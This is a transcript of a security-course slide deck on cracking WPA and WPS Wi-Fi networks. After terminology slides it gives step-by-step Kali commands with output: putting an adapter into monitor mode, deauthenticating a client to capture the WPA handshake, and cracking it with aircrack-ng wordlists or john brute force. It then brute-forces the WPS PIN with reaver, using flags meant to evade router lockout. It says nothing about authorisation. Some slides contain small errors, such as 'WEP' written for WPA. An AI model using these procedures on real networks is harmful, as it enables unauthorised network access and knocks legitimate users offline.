1 / 36

Wireless Attacks: WPA/WPS

Wireless Attacks: WPA/WPS. Module Type: Basic Method Module Number: 0x01 Last Updated: 2017-01-16 Author: Hermit. Topics. Common Terminology What is WPA? How is WPA Vulnerable? The WPA Attack: Step by Step The WPS Attack: Step by Step Additional resources. Common Terminology.

varen
Télécharger la présentation

Wireless Attacks: WPA/WPS

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Wireless Attacks: WPA/WPS Module Type: Basic Method Module Number: 0x01 Last Updated: 2017-01-16 Author: Hermit

  2. Topics • Common Terminology • What is WPA? • How is WPA Vulnerable? • The WPA Attack: Step by Step • The WPS Attack: Step by Step • Additional resources

  3. Common Terminology • Wireless Local Area Network (WLAN) • A network that is connected wirelessly instead of with physical cables. Clients communicate with access points (AP), which relay traffic to external networks. Defined by the 802.11 specification. • Radio Frequency (RF) • An electromagnetic wave, such as AM or FM radio. When referring to WLANs we use pre-defined values called channels, numbered from 1 through 14 • Initialization Vector (IV) • A number intended to be used only once as a random seed (alongside a common secret) in cryptography, to uniquely encode data. IVs are also sometimes called “nonces” (meaning “used only once”).

  4. Common Terminology • The 802.11 specification defines seven modes for wireless network devices: • Master: Act as an AP • Managed: Act as a client • Monitor: Monitor all traffic, not just one network, without associating first • Promiscuous: Pass all traffic to the CPU, does require associating first, but allows injection back into associated networks • Ad-hoc: There is no central AP or infrastructure. Each device communicates directly with each other device. Ad-hoc and mesh are not exclusive. • Mesh: Each device can relay/route packets for other devices, but devices do not communicate directly with each other. • Repeater: Act as a ”dumb” repeater and retransmit received signals.

  5. Common Terminology • Service Set Identifier (SSID) • The human readable “friendly” name of a WLAN. • Basic SSID (BSSID) • The MAC address of an AP. • Extended SSID (ESSID) • A collection of BSSIDs, functionally considered equivalent to an SSID.

  6. What is WPA? • Wi-Fi Protected Access (WPA) is a security protocol for WLANs that was intended to address the weaknesses of WEP, and which was an interim solution until what we now know as WPA2 became widely available and supported. • It uses a 256 bit key, most commonly by using Password Based Key Derivation Function 2 (PBKDF2) against the password and salting with the SSID. • It also introduced Wi-Fi Protected Setup (WPS), which as-implemented has become a massive security hole. • It uses Temporal Key Integrity Protocol (TKIP), meaning that each packet gets a unique key. This is fed to RC4 (just like WEP) to encrypt.

  7. How is WPA Vulnerable? • WPA fixed the random key weakness of WEP for RC4 since each 128 bit key is unique. • Unfortunately, multiple cryptographic weaknesses were found with this as well, including the ability to inject arbitrary numbers of packets to a network for which you don’t know the passphrase and decryption of arbitrary packets as well. • This presentation focuses on the actual passphrase recovery techniques against WPA and WPS. A future presentation will describe the arbitrary injection technique. • The attacks are focused on the authentication handshake (for WPA itself) and a brute force enumeration technique (for WPS). • There was a recently disclosed flaw in the random number generator that allows for recovery of the WPA2-Enterprise group key and arbitrary injection as well.

  8. The WPA Attack Step-by-Step

  9. Attack Setup • This assumes that you have a 2016 release of Kali Linux installed, as well as hardware capable of being put into monitor mode. • If in doubt, get an Alfa card. • All commands are expected to be run with superuser (i.e. root) privileges. • The aircrack-ng suite is expected to be part of the installation.

  10. The WPA Attack: Step by Step (Overview) • Open a terminal window. • Kill any potentially conflicting applications/services. • Identify your wireless device. • Put your wireless device into monitor mode. • Verify monitor mode. • Identify target network and a specific client. • Begin packet capture from target network. • De-authenticate the chosen client. • Crack WPA shared key.

  11. The WPA Attack: Step 1 • Open a terminal window… no graphics here, because if you can’t do this part then the rest of this guide is really beyond you.

  12. The WPA Attack: Step 2 • Kill any potentially conflicting applications/services. airmon-ng check kill root@:~# airmon-ng check kill Killing these processes:   PID Name  5664 wpa_supplicant

  13. The WPA Attack: Step 3 • Identify your wireless device (we’ll use “wlan0” for this tutorial) ifconfig -a

  14. The WPA Attack: Step 4 • Put your wireless device into monitor mode. airmon-ng start wlan0 root@:~# airmon-ng start wlan0 PHY Interface Driver Chipset phy0 wlan0 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01) (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)

  15. The WPA Attack: Step 5 • Verify monitor mode. ifconfig -a

  16. The WPA Attack: Step 6 • Identify target network (write down SSID, channel, and BSSID) and client (write down MAC address) airodump-ng wlan0mon CH 14 ][ Elapsed: 0 s ][ 2017-01-10 10:16                                           BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  AA:BB:CC:DD:EE:FF  -49        2        1    0   9  54e  WPA2 TKIP   PSK  REDACTED     AA:BB:CC:DD:EE:FF  -53        2        0    0   6  54e. WEP  WEP         <length:  1>   AA:BB:CC:DD:EE:FF  -52        4        0    0   6  54e. OPN              REDACTED  AA:BB:CC:DD:EE:FF  -81        2        0    0   1  54e  WPA2 CCMP   PSK  REDACTED  99:88:77:66:55:44  -44        3       11    0   1  54 . WPA  TKIP   PSK  WPAVICTIM                                          AA:BB:CC:DD:EE:FF  -86        0        3    0   1  54e  WPA2 CCMP   PSK  REDACTED  AA:BB:CC:DD:EE:FF   -1        0        0    0   1  -1                    <length:  0>  BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                    99:88:77:66:55:44  00:11:22:33:44:55  -37   48e-18e     0       10                                                           AA:BB:CC:DD:EE:FF  F0:7B:CB:2E:9A:5D  -87    0 - 1      0        7              

  17. The WPA Attack: Step 7 • Begin packet capture from target network. Leave this running while you do the next step. airodump-ng --channel {#} --bssid {BSSID} –a -w /tmp/WPAVICTIM-DEMO wlan0mon root@:~# airodump-ng --channel 1 --bssid 99:88:77:66:55:44 -a -w /tmp/WPAVICTIM-DEMO wlan0mon CH  1 ][ Elapsed: 6 s ][ 2017-01-10 10:21                                           BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  99:88:77:66:55:44  -42  71       89       74    7   1  54e. WPA  TKIP   PSK  WPAVICTIM  BSSID              STATION            PWR   Rate    Lost    Frames  Probe   99:88:77:66:55:44  00:11:22:33:44:55  -36   48e-24e   576      130        

  18. The WPA Attack: Step 8 • De-authenticate the selected client to force a reconnect so you can capture the WPA handshake. Run this in a separate terminal window while leaving the other programs executing: aireplay-ng -0 -b {BSSID} -t 1 -c FF:FF:FF:FF:FF:FF -p 0481 wlan0mon root@:~# aireplay-ng -0 5 -a 99:88:77:66:55:44 -c 00:11:22:33:44:55 wlan0mon 10:22:51  Waiting for beacon frame (BSSID: 99:88:77:66:55:44) on channel 1 10:22:52  Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [31|55 ACKs] 10:22:52  Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [14|109 ACKs] 10:22:53  Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [14|73 ACKs] 10:22:53  Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [12|68 ACKs] 10:22:54  Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [ 9|62 ACKs]

  19. The WPA Attack: Step 9 • Verify handshake capture in your capture window CH  1 ][ Elapsed: 6 s ][ 2017-01-10 10:21 ][ WPA handshake: 99:88:77:66:55:44  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  99:88:77:66:55:44  -42  71       89       74    7   1  54e. WPA  TKIP   PSK  WPAVICTIM  BSSID              STATION            PWR   Rate    Lost    Frames  Probe   99:88:77:66:55:44  00:11:22:33:44:55  -36   48e-24e   576      130        

  20. The WPA Attack: Step 10 (Version 1) • Crack WEP shared key (your file name will vary based upon how many times you have started the capture). Do this in a third terminal window. aircrack-ng –w /path/to/wordlist –e {SSID} WPA-DEMO-02.cap • Leave this running and it will automatically retry whenever a new candidate IV capture threshold is reached until the key is recovered.

  21. The WPA Attack: Step 10 (Version 1) root@:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt –e WPAVICTIM /tmp/WPAVICTIM-DEMO-02.cap  Opening /tmp/WPAVICTIM-DEMO-02.cap Reading packets, please wait...                                  Aircrack-ng 1.2 rc4       [00:00:01] 3276/7120712 keys tested (3102.56 k/s)        Time left: 38 minutes, 14 seconds                          0.05%                           KEY FOUND! [ nopassword ]       Master Key     : 99 89 C4 7C F5 7D 12 2B E4 FB F7 5F AC F0 4E 1D                         73 FE B9 16 FD D1 5A 3E 97 5E 28 25 9A D7 07 F4        Transient Key  : 84 31 80 67 D8 28 E0 B1 5C 49 81 42 33 B0 D9 1C                         0A 1D 6D 77 59 EE 1E F1 1A 40 E3 82 82 A4 54 22                         35 14 06 33 8F 13 47 1D 47 5B 99 BF 60 8A 9F C2                         AB C3 89 94 1B F5 53 77 F8 D8 6C 98 30 DD AA BC        EAPOL HMAC     : 26 54 A4 8F BC 0A D3 5E A9 B4 31 C4 64 FA 9E 24 

  22. The WPA Attack: Step 10 (Version 2) • Crack WEP shared key (your file name will vary based upon how many times you have started the capture). john -stdout:{#} -incremental | aircrack-ng –w - –e {SSID} WPA-DEMO-02.cap • This brute-forces every option until the key is found up to {#} characters. This works by redirecting john the ripper incremental password generation from STDOUT via the pipe to STDIN, and then using the Linux special character “-” to specify treating STDIN like a file.

  23. The WPA Attack: Step 10 (Version 2) root@Vitruvian:~# john -stdout:10 -incremental | aircrack-ng -e WPAVICTIM -w - /tmp/WPAVICTIM-DEMO-02.cap  Opening /tmp/WPAVICTIM-DEMO-02.cap Warning: MaxLen = 13 is too large for the current hash type, reduced to 10 Press 'q' or Ctrl-C to abort, almost any other key for status Opening /tmp/WPAVICTIM-DEMO-02.cap Reading packets, please wait... Aircrack-ng 1.2 rc4                    [00:00:03] 6690 keys tested (1736.15 k/s)                         Current passphrase: portugal       Master Key     : B6 20 C4 AA A1 8B 39 4C E0 6F B5 15 91 C4 81 43                         C1 F4 92 2C EE 34 4C C4 D9 1B AA E4 C7 2D 5C 30        Transient Key  : 28 7F BF 41 EC 19 72 7C B6 ED 9C 78 54 54 B5 98                         EE 74 9A 5F 48 2E 1C 87 DE 6A AA 84 92 CE 3C DF                         98 3B D1 4A 2E 8D E2 CE 60 77 FF 55 E2 47 39 B9                         E3 75 29 23 46 FC AC 4B 17 A7 ED 8D 5D 74 7A 9E        EAPOL HMAC     : 04 31 E3 87 14 83 BC 7D 30 9A 0D 1F 9D 91 D1 03 

  24. The WPS Attack Step-by-Step

  25. Attack Setup • This assumes that you have a 2016 release of Kali Linux installed, as well as hardware capable of being put into monitor mode. • If in doubt, get an Alfa card. • All commands are expected to be run with superuser (i.e. root) privileges. • The aircrack-ng suite is expected to be part of the installation.

  26. The WPS Attack: Step by Step (Overview) • Open a terminal window. • Kill any potentially conflicting applications/services. • Identify your wireless device. • Put your wireless device into monitor mode. • Verify monitor mode. • Identify target network. • Brute-force WPS PIN for target network.

  27. The WPS Attack: Step 1 • Open a terminal window… no graphics here, because if you can’t do this part then the rest of this guide is really beyond you.

  28. The WPS Attack: Step 2 • Kill any potentially conflicting applications/services. airmon-ng check kill root@:~# airmon-ng check kill Killing these processes:   PID Name  5664 wpa_supplicant

  29. The WPS Attack: Step 3 • Identify your wireless device (we’ll use “wlan0” for this tutorial) ifconfig -a

  30. The WPS Attack: Step 4 • Put your wireless device into monitor mode. airmon-ng start wlan0 root@:~# airmon-ng start wlan0 PHY Interface Driver Chipset phy0 wlan0 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01) (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)

  31. The WPS Attack: Step 5 • Verify monitor mode. ifconfig -a

  32. The WPS Attack: Step 6 • Identify target network (write down SSID, channel, and BSSID wash -i wlan0mon root@:~# wash -i wlan0mon BSSID Channel RSSI WPS Version WPS Locked ESSID ------------------------------------------------------------------------------- 99:88:77:66:55:44 1 -50 1.0 No WPAVICTIM

  33. The WPS Attack: Step 7 • Brute-force WPS PIN for target network. reaver -i wlan0mon -c {channel} –b {BSSID} –vv • Or for “hardened” WPS installations: reaver -i wlan0mon -c {channel} –b {BSSID} –vv -L -N -T -r 3:30 The "-L" ignores the locked state being reported by the router. The "-N" disables responding with NACK when out of order messages are received (which can occur when you're sending so many attempts). The "-T" sets the M5 and M7 protocol timings to 0.2 seconds (unless you specify an alternate timeline). The "-r 3:30" specifies that after every three attempts to sleep for 30 seconds, which in my experience is enough to clear the flood detection mechanisms on most routers, but YMMV.

  34. The WPS Attack: Step 7 root@:~# reaver -i wlan0mon -c 1 –b 99:88:77:66:55:44 –vv [+] Switching wlan0mon to channel 1 [+] Waiting for beacon from 99:88:77:66:55:44 [+] Associated with 99:88:77:66:55:44 (ESSID: WPAVICTIM) [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Sending M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received M5 message [+] Sending M6 message [+] Received M7 message [+] Sending WSC NACK [+] Sending WSC NACK {ETC} [+] Pin cracked in 9742 seconds [+] WPS PIN: ‘12345678’ [+] WPA PSK: ‘REDACTED’ [+] AP SSID: ‘WPAVICTIM’

  35. Questions?

  36. Additional Resources • Technical overview of WEP/WPA cracking methods: • https://dl.aircrack-ng.org/breakingwepandwpa.pdf • Random Number Generator vulnerability: • https://www.usenix.org/system/files/conference/usenixsecurity16/sec16_paper_vanhoef.pdf • WPS Technical Details • https://briolidz.wordpress.com/2012/01/10/wi-fi-protected-setup-wps/ • Hermit • https://twitter.com/hermit_hacker • https://www.cryptolingus.net/ • https://www.stackattack.net/blog/

More Related